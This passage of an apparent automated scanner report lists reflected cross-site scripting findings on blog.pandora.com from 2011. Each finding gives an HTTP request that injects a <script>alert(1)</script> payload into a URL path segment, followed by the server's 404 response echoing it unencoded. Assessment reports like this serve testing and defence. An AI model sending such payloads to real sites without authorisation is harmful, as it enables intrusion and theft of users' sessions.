Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ was not found on this server.</p>
...[SNIP]...

3.70. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27be<script>alert(1)</script>78a1bab0ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ was not found on this server.</p>
...[SNIP]...

3.71. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3449<script>alert(1)</script>fffe6e73560 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ was not found on this server.</p>
...[SNIP]...

3.72. http://blog.pandora.com/pandora/archives/2006/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41581<script>alert(1)</script>c6f00e54db1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ was not found on this server.</p>
...[SNIP]...

3.73. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc284<script>alert(1)</script>5ac9a5cf490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ was not found on this server.</p>
...[SNIP]...

3.74. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29463<script>alert(1)</script>88dd0003541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ was not found on this server.</p>
...[SNIP]...

3.75. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 826cd<script>alert(1)</script>9d679957bf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ was not found on this server.</p>
...[SNIP]...

3.76. http://blog.pandora.com/pandora/archives/2006/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7029<script>alert(1)</script>c9c50ef33cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ was not found on this server.</p>
...[SNIP]...

3.77. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dc61<script>alert(1)</script>2a8a18ec9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ was not found on this server.</p>
...[SNIP]...

3.78. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee470<script>alert(1)</script>1e1c157cf31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ was not found on this server.</p>
...[SNIP]...

3.79. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eab0<script>alert(1)</script>503e2b138de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ was not found on this server.</p>
...[SNIP]...

3.80. http://blog.pandora.com/pandora/archives/2006/10/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7d2c<script>alert(1)</script>8f8c0843fd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ was not found on this server.</p>
...[SNIP]...

3.81. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fc20<script>alert(1)</script>d72027cb382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ was not found on this server.</p>
...[SNIP]...

3.82. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e051<script>alert(1)</script>cfbbd073882 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ was not found on this server.</p>
...[SNIP]...

3.83. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b74cd<script>alert(1)</script>9b829fedb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ was not found on this server.</p>
...[SNIP]...

3.84. http://blog.pandora.com/pandora/archives/2006/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4491<script>alert(1)</script>0e7243d947a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ was not found on this server.</p>
...[SNIP]...

3.85. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f27b<script>alert(1)</script>ff6cdc57baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ was not found on this server.</p>
...[SNIP]...

3.86. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b166<script>alert(1)</script>c595edeaf7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
